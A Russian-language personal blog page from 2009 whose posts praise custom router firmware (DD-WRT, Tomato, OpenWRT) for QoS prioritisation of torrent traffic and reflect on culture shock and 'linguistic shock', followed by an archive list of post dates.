Да, кстати, самый офигенны плюс в QoS, кто ещё не понял — торрент теперь может фигачить без ограничения. Приоритеты можно настроить так, чтобы он не мешал другому трафику. Респект ;-)

Хозяйке на заметку! DD-WRT основан на OpenWRT, который, в свою очередь на коде Linksys'а и Tomato на их коде. Причём в оригинальной, заводской прошивке всё настолько ~~уёби~~ не удобно, не понятно, не доделано. Линксисковсы явно из-за бабок не хотят продавать подобные вещи out of the box.

Ресурсы по DD-WRT

Ресурсы по Tomato

Основная прошивка OpenWRT

Другая полезная информация

Давненько не писал, да ещё и по-русски:) Прежде всего, с новым 2009 годом! (если кто читает этот пост).

Случайно слушая подкаст (буквально подслушивая у Наташки) freetonik'a (или pax'а) студента, проживающего в Канаде в Оттаве, услышал о культурном шоке.

Культурный шок — эмоциональный или физический дискомфорт, дезориентация индивида, вызванная попаданием в иную культурную среду, столкновением с другой культурой, незнакомым местом. Привыкание к новому окружению может быть волнующим, стрессовым, может обмануть ожидания, быть забавным или просто сбить с толку. Термин был впервые употреблён Кальверо Обергом в 1954 году.

В общем, занятная штука эта — психология. Американский антрополог Ф. Бок даёт четыре способа разрешения этого конфликта: геттоизация, ассимиляция, промежуточный и частичная ассимиляция.
У меня, получается, частичная ассимиляция — самый распространённый вариант. Как-то хорошо на душе становится, когда открываешь подобного рода вещи, которые тревожат.

Ещё один шок, который встретил, пока искал информацию об этом — лингвистический. Лингвистический шок (англ. linguistic shock, language shock) определяется как состояние удивления, смеха или смущения, возникающее у человека, когда он слышит в иноязычной речи языковые элементы, звучащие на его родном языке странно, смешно или неприлично. Смеховой эффект в отношении иностранного языка возникает в случаях, когда нейтральное по значению слово одного языка омонимично слову родного языка, обладающему совершенно другим значением.
Весёлый постец по нему с примерами — Лингвистический шок, или перевод без смеха.

Thursday, December 31, 2009

Monday, November 23, 2009

Wednesday, November 18, 2009

Monday, November 16, 2009

Wednesday, November 11, 2009

Wednesday, November 4, 2009

Sunday, October 25, 2009

Sunday, October 11, 2009

Tuesday, October 6, 2009

Tuesday, September 29, 2009

Monday, September 14, 2009

Saturday, August 1, 2009

Thursday, July 23, 2009

Saturday, July 11, 2009

Friday, July 10, 2009

Tuesday, June 30, 2009

Sunday, June 28, 2009

Wednesday, June 3, 2009

Friday, May 29, 2009

Saturday, May 16, 2009

Monday, May 4, 2009

Sunday, May 3, 2009

Wednesday, April 15, 2009

Monday, April 13, 2009

Sunday, April 5, 2009

Saturday, April 4, 2009

Wednesday, March 11, 2009

Saturday, February 14, 2009

Friday, January 30, 2009

Wednesday, January 28, 2009

Saturday, January 24, 2009

Wednesday, January 7, 2009

Google Analytics

useful links

archive

tags

AddThis